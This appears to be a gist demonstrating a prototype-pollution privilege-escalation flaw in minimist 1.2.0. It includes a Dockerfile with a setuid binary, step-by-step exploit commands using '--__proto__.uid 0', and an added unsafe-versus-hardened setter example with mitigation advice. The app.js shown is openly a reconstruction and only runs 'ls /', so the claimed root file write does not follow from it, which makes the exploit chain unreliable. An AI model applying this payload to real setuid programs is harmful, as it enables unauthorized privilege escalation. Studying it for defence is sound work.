Last active Nov 29, 2020
Prototype Pollution security vulnerability in minimist

How to run:

  1. npm i
  2. npm run build
  3. npm run start


You are now in a sandbox running with the permissions of just-user. Our goal is to create test.txt at the root of the container, which this user does not have permission to do.

To confirm this, try the following:

    echo "test" > /test.txt
    bash: /test.txt: Permission denied


  1. Create exploit script: printf '#!/bin/sh\necho "test" > /test.txt' > /tmp/exploit
  2. Give it execute permission: chmod +x /tmp/exploit
  3. Run the application: ./app --__proto__.uid 0 /tmp/exploit

To validate, run cat /test.txt.

As you can see, the vulnerable application gives us a permission violation: just-user was able to create a file at the root of the container.

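app.js:

    const argv = require('minimist')(process.argv.slice(2));
    const cp = require('child_process');

    // NOTE: the original condition is missing from this page. Assumed here:
    // reject any parsed option, i.e. any own key of argv other than "_".
    if (Object.keys(argv).length > 1) {
      console.log("This app has no options - just show list of files in root");
    } else {
      // List the root directory through a child process.
      console.log(String(cp.execSync('ls /')));
    }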

Dockerfile:

    FROM ubuntu:18.04
    COPY ./app /app
    RUN chmod u+s /app
    RUN useradd -s /bin/bash just-user
    USER just-user

package.json:

    {
      "name": "poc",
      "version": "1.0.0",
      "description": "",
      "main": "index.js",
      "keywords": [],
      "author": "",
      "license": "ISC",
      "scripts": {
        "start": "docker run --rm -it poc bash",
        "build": "npm run build:cli && npm run build:docker",
        "build:cli": "pkg app.js --target node10-linux-x64",
        "build:docker": "docker build . --tag poc"
      },
      "dependencies": {
        "minimist": "1.2.0"
      },
      "devDependencies": {
        "pkg": "4.4.4"
      }
    }
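
Added example (not part of the original gist and not minimist's own code): a simplified dotted-key setter showing why --__proto__.uid 0 never shows up among argv's own keys yet changes what every later options object inherits, next to a hardened setter that drops such keys. The names setKeyUnsafe, setKeySafe and demo are hypothetical.

```javascript
// Added example: simplified stand-in for a dotted-key argument setter.
// It is NOT minimist's source; all names below are hypothetical.
const BLOCKED = new Set(['__proto__', 'constructor', 'prototype']);

// Vulnerable pattern: every path segment is followed with plain property access.
function setKeyUnsafe(obj, path, value) {
  const keys = path.split('.');
  let o = obj;
  for (const key of keys.slice(0, -1)) {
    if (o[key] === undefined) o[key] = {};
    o = o[key]; // for '__proto__' this is Object.prototype, shared by all objects
  }
  o[keys[keys.length - 1]] = value;
}

// Hardened pattern: reject dangerous segments, descend only into own properties.
function setKeySafe(obj, path, value) {
  const keys = path.split('.');
  if (keys.some((k) => BLOCKED.has(k))) return false; // drop the option entirely
  let o = obj;
  for (const key of keys.slice(0, -1)) {
    const own = Object.prototype.hasOwnProperty.call(o, key);
    if (!own || typeof o[key] !== 'object' || o[key] === null) o[key] = {};
    o = o[key];
  }
  o[keys[keys.length - 1]] = value;
  return true;
}

// Parse the page's "--__proto__.uid 0" with the given setter and report what
// unrelated code observes afterwards.
function demo(setter) {
  const argv = { _: [] };
  setter(argv, '__proto__.uid', 0);
  const result = {
    ownKeys: Object.keys(argv),            // what an "any options?" check sees
    inheritedUid: ({}).uid,                // what a fresh options object inherits
    nullProtoUid: Object.create(null).uid, // caller-side mitigation: no prototype
  };
  delete Object.prototype.uid;             // restore global state
  return result;
}

console.log('unsafe:', demo(setKeyUnsafe));
console.log('safe:  ', demo(setKeySafe));
```

Upgrading minimist past the vulnerable 1.2.0 pinned in package.json removes the polluting parse; building sensitive options objects with Object.create(null) is a second layer on the caller's side.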